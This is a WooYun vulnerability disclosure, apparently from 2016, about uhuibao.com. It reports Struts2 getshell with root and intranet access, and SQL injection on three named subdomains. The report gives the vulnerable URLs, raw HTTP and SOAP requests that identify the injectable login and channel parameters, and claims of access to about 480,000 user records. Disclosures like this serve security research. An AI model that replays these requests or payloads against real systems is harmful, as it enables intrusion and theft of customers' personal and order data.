当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0198164

漏洞标题:游惠宝四大重要站点漏洞打包GETSHELL/SQL注入(涉及14W+订单交易/48W+用户数据/已进内网)

相关厂商:uhuibao.com

漏洞作者: 路人甲

提交时间:2016-04-19 14:55

修复时间:2016-04-24 15:00

公开时间:2016-04-24 15:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-19: 细节已通知厂商并且等待厂商处理中
2016-04-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

1、Getshell
游惠宝IOS APP,以下地方存在S2-005/S2-016漏洞,直接Getshell

http://if.uhuibao.com:9090/interface/askApp.action


shell.jpg


Root权限,已进内网

shell.jpg


shell.jpg


2、SQL注入
1)站点:http://pay.uhuibao.com:8083/
以下地方存在SQL注入:(POST中的loginname,布尔盲注)

POST http://pay.uhuibao.com:8083/SunspeedyPayment/VloginUser.action HTTP/1.1
Host: pay.uhuibao.com:8083
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://pay.uhuibao.com:8083/SunspeedyPayment/
Content-Length: 48
Cookie: JSESSIONID=675A3C973B8FB6B9E37629E175B61945
Connection: keep-alive
loginname=admin&loginpwd=admin&exchangLang=zh_CN


2)站点:http://e.uhuibao.com:8080/
以下地方存在SQL注入,POST中的channel,布尔盲注

POST http://e.uhuibao.com:8080/ticket/eticket.action HTTP/1.1
Content-Length: 264
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://e.uhuibao.com:8080/ticket/eticket.action
Cookie: vst=IE001tOillki/hE881nQVHSYL6xUh1PwpiEyekl6MJPr+Mg3i9snZutEIwZa+t7cC5Ia9EWxXTmDFJO70VcbrOm4BXC4QM00JEJjCneQAF4DC4G4=; JSESSIONID=3C1396A90044540EC6C51FFF2ABE659A; JSESSIONID=3C1396A90044540EC6C51FFF2ABE659A
Host: e.uhuibao.com:8080
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
channel=TICKET_UHBAPP&format=json&message=message%3D%7B%22request_message%22%3A%7B%22req_type%22%3A%2205%22%2C%22message%22%3A%7B%22type%22%3A%221%22%7D%7D%7D&method=eticketrequest&sign=A3485240A2F74A515198E03E15723CE0&timestamp=2016-04-19+13%3A28%3A40&version=1.0


3)站点:http://ws.uhuibao.com:88/
POST中的Loginname,报错注入

POST http://ws.uhuibao.com:88/OrclApp.asmx HTTP/1.1
SOAPAction: http://ws.uhuibao.com/MobileUserLoginDevice
Content-Type: text/xml
Content-Length: 359
Referer: http://ws.uhuibao.com:88/OrclApp.asmx
Host: ws.uhuibao.com:88
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
<soap:Envelope xmlns:xsi="1&apos;&quot;" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><MobileUserLoginDevice xmlns="http://ws.uhuibao.com/"><LoginName><![CDATA[admin]]></LoginName><Password><![CDATA[2365675]]></Password><Deviceid></Deviceid></MobileUserLoginDevice></soap:Body></soap:Envelope>

漏洞证明:

1、当前数据库用户,root

user3.jpg


2、所有数据库,共37个

dbs2.jpg


3、用户表和订单表,涉及14W+订单交易/48W+用户数据

tb3.jpg


tb2.jpg

修复方案:

请多指教~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-04-24 15:00

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价

  1. 2016-04-19 14:58 | 小苹果 ( 普通白帽子 | Rank:192 漏洞数:56 | 只要锄头挥的好,哪有洞挖不到)

    66666

  2. 2016-04-19 15:08 | 小牛牛 ( 普通白帽子 | Rank:104 漏洞数:15 | 求带)

    火钳刘明啊。。。坐等看结果

  3. 2016-04-19 16:12 | j14n ( 普通白帽子 | Rank:1537 漏洞数:293 | print (‘\n’.join([’ ‘.join([‘%s*%s=...)

    我曹 我上周发现这个公司一个洞,没来得及提交 重装了 找不到了。。